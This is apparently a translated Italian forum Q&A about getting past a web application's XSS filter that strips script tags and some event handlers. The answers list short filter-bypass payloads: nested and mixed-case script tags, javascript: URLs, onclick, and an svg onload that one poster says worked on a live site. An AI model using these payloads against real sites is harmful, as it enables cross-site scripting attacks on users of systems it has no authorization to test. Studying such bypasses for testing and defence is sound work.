Se scriviamo test ">script>alert(1)/script> , l'applicazione sta filtrando il JavaScript con test">[removed]alert(1)[removed] .
E payload come onmouseover , onmouseout stanno saltando.
In questo caso, quale tipo di bypass JavaScript può essere utilizzato per eseguire XSS.
Penso che puoi provare con le seguenti opzioni:
<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</ScRiPt>
Puoi anche usare un altro tag HTML:
<img src="javascript:alert(1)">
<h1 onclick="alert(1)">Click me</h1>
Ti consiglio il seguente link, potresti trovare utili esempi.
Spero che questa informazione ti aiuti.
Buona fortuna.
Un po 'tardi, ma oggi mi sono imbattuto in un sito web che filtra nello stesso identico modo. Sono riuscito a bypassarlo in questo modo:
<svg/onload=alert(1);
Leggi altre domande sui tag javascript xss